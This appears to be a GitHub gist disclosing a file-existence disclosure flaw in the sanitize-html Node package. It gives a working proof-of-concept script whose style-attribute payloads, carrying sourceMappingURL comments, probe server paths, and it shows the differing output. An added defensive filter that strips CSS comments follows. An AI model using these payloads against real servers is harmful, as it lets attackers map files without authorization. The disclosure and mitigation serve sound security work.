@Slonser
Last active February 13, 2024 08:07
sanitize-html disclose files

Overview

The sanitize-html package, when used on the backend with the "style" attribute allowed, lets an attacker enumerate files on the server's file system (including project dependencies): the sanitizer's output differs depending on whether a path named in the input exists.

PoC

  1. npm i sanitize-html
  2. node index.js
```js
// index.js
const sanitizeHtml = require('sanitize-html');

// Same markup twice; only the path in the sourceMappingURL comment differs.
// The first points at a file that exists after "npm i sanitize-html",
// the second at a path that does not exist.
const file_exist = `<a style='background-image: url("/*# sourceMappingURL=./node_modules/sanitize-html/index.js */");'>@slonser_</a>`;
const file_notexist = `<a style='background-image: url("/*# sourceMappingURL=./node_modules/randomlibrary/index.js */");'>@slonser_</a>`;

// "style" must be allowed on <a> for the attribute to be parsed at all.
const file_exist_clean = sanitizeHtml(file_exist, {
    allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] },
});

const file_notexist_clean = sanitizeHtml(file_notexist, {
    allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] },
});

console.log(file_exist_clean, "// valid file path on backend");
console.log(file_notexist_clean, "// invalid file path on backend");
```

Output:

```html
<a>@slonser_</a> // valid file path on backend
<a style="background-image:url(&quot;/*# sourceMappingURL=./node_modules/randomlibrary/index.js */&quot;)">@slonser_</a> // invalid file path on backend
```

When the referenced file actually exists on the server (and is not a valid source map), the "style" attribute is dropped from the output. Otherwise it is preserved, so the presence or absence of the attribute acts as an existence oracle for arbitrary paths.
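As an added defensive example (my own code, not the gist author's or the sanitize-html project's): a pre-filter that strips CSS block comments from a style value before it reaches the CSS parser, so a sourceMappingURL directive is never seen; the sample inputs are constructed to mirror the PoC payload, and the function names are mine. Because the PoC places the directive inside a url("...") string, the stripper deliberately ignores string boundaries.

```javascript
// Added example, not part of the gist: neutralise sourceMappingURL probes in
// "style" attribute values before sanitize-html parses them. Runs offline;
// the sample values below are constructed to match the PoC payloads.

// Matches the directive form used by the PoC: /*# sourceMappingURL=...
const SOURCE_MAP_DIRECTIVE = /\/\*\s*[#@]\s*sourceMappingURL\s*=/i;

// Detection: true when a style value carries a source map directive inside a
// comment. Real stylesheets have no business putting this in an inline style.
function containsSourceMapDirective(style) {
  return SOURCE_MAP_DIRECTIVE.test(style);
}

// Mitigation: remove every /* ... */ block comment from a style value.
// String context is intentionally ignored, since the PoC hides the comment
// inside url("..."). An unterminated comment is dropped to end of string.
function stripCssComments(style) {
  let out = '';
  let i = 0;
  while (i < style.length) {
    if (style[i] === '/' && style[i + 1] === '*') {
      const end = style.indexOf('*/', i + 2);
      if (end === -1) break;          // unterminated: discard the rest
      i = end + 2;
      continue;
    }
    out += style[i++];
  }
  return out;
}

// Returns the cleaned style value, or null when reject=true and a directive
// was present (treat the input as probing rather than styling).
function hardenStyleValue(style, { reject = false } = {}) {
  if (reject && containsSourceMapDirective(style)) return null;
  return stripCssComments(style);
}

// Constructed samples equivalent to the gist's payloads.
const probeStyle = 'background-image: url("/*# sourceMappingURL=./node_modules/sanitize-html/index.js */");';
const benignStyle = 'background-image: url("/img/bg.png"); color: red;';

module.exports = { containsSourceMapDirective, stripCssComments, hardenStyleValue, probeStyle, benignStyle };
```

Apply it to each element's style value before the markup is handed to sanitizeHtml (wiring it into sanitize-html's transformTags hook is my assumption about hook ordering); the simpler mitigation the overview implies is to leave style out of allowedAttributes on the backend altogether.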

Credit

Vsevolod Kokorin (Slonser) of Solidlab
